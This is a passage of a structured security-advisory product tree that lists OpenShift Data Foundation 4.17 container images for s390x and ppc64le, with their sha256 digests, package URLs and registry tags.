"pkg:oci/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product: { name: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product_id: "odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product: { name: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product_id: "odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3?arch=s390x&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product: { name: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product_id: "odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product: { name: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product_id: "odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310?arch=s390x&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54?arch=s390x&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:328ddae72c795012c7671c214d9a84d539264f8fe855d1a9e2dbb74590e72076?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:7fa969e6714e0c3851f30999df5c823cd5738f28e1b2f6c06d940541c6edad4e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168_s390x", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:02e65965166ec9794f11b663de59671f159f8b2fef4d56ee5589b26bef342168?arch=s390x&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product_id: "odf4/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-console-rhel9@sha256:df597ffd1b0d14d394e39b1d92fc90797bea5386a390450193d99f7db5bc377c?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product: { name: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product_id: "odf4/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-operator-bundle@sha256:883ba750931a93d30ff1dd3ed78592940a0079640da3d79400261f43fbecb69f?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product: { name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product_id: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", product_identification_helper: { purl: "pkg:oci/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af?arch=s390x&repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator&tag=v4.17.0-17", }, }, }, { category: "product_version", name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product: { name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product_id: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", product_identification_helper: { purl: "pkg:oci/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61?arch=s390x&repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9&tag=v4.17.0-14", }, }, }, { category: "product_version", name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product: { name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product_id: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", product_identification_helper: { purl: "pkg:oci/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012?arch=s390x&repository_url=registry.redhat.io/odf4/odf-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product: { name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product_id: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", product_identification_helper: { purl: "pkg:oci/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e?arch=s390x&repository_url=registry.redhat.io/odf4/odf-rhel9-operator&tag=v4.17.0-20", }, }, }, { category: "product_version", name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product: { name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product_id: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", product_identification_helper: { purl: "pkg:oci/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7?arch=s390x&repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product: { name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product_id: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", product_identification_helper: { purl: "pkg:oci/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product: { name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product_id: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", product_identification_helper: { purl: "pkg:oci/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5?arch=s390x&repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product: { name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product_id: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", product_identification_helper: { purl: "pkg:oci/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb?arch=s390x&repository_url=registry.redhat.io/odf4/odr-rhel9-operator&tag=v4.17.0-40", }, }, }, { category: "product_version", name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product: { name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product_id: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", product_identification_helper: { purl: "pkg:oci/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705?arch=s390x&repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product: { name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product_id: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product: { name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product_id: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", product_identification_helper: { purl: "pkg:oci/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7?arch=s390x&repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator&tag=v4.17.0-51", }, }, }, ], category: "architecture", name: "s390x", }, { branches: [ { category: "product_version", name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product: { name: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product_id: "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9&tag=v4.17.0-46", }, }, }, { category: "product_version", name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product: { name: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product_id: "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product: { name: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product_id: "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", product_identification_helper: { purl: "pkg:oci/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202?arch=ppc64le&repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator&tag=v4.17.0-15", }, }, }, { category: "product_version", name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product: { name: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product_id: "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-core-rhel9&tag=v4.17.0-69", }, }, }, { category: "product_version", name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product: { name: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product_id: "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product: { name: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product_id: "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", product_identification_helper: { purl: "pkg:oci/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55?arch=ppc64le&repository_url=registry.redhat.io/odf4/mcg-rhel9-operator&tag=v4.17.0-23", }, }, }, { category: "product_version", name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product: { name: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product_id: "odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product: { name: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product_id: "odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product: { name: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product_id: "odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator&tag=v4.17.0-31", }, }, }, { category: "product_version", name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product: { name: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product_id: "odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-metrics-exporter-rhel9&tag=v4.17.0-66", }, }, }, { category: "product_version", name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product: { name: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product_id: "odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product: { name: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product_id: "odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", product_identification_helper: { purl: "pkg:oci/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0?arch=ppc64le&repository_url=registry.redhat.io/odf4/ocs-rhel9-operator&tag=v4.17.0-60", }, }, }, { category: "product_version", name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product: { name: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product_id: "odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cli-rhel9&tag=v4.17.0-29", }, }, }, { category: "product_version", name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product: { name: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product_id: "odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-console-rhel9&tag=v4.17.0-53", }, }, }, { category: "product_version", name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product: { name: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product_id: "odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-cosi-sidecar-rhel9&tag=v4.17.0-7", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product: { name: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product_id: "odf4/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-operator-bundle@sha256:f3f28074884a29b5d28f4535af6489f1ca8326dd60689c4bc8c862277dcb6e22?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-operator-bundle&tag=v4.17.0-126", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product: { name: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product_id: "odf4/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-rhel9-operator@sha256:b96b09407708601d04abb6a90d16f6f1260839534d64238b6aa4c7a5f458a6a4?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product: { name: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product_id: "odf4/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c_ppc64le", product_identification_helper: { purl: "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:7a206b9fe0e540674fc9ec97b338607e61b8bfd3bfe30855835d0a940ca9304c?arch=ppc64le&repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9&tag=v4.17.0-30", }, }, }, { category: "product_version", name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product: { name: "odf4/odf-multicluster-console-rhel9@sha256:25052271f038b691ef973ac5a9fc02eee015a0427e087a5a390f1e31f7823d79_ppc64le", product_id: 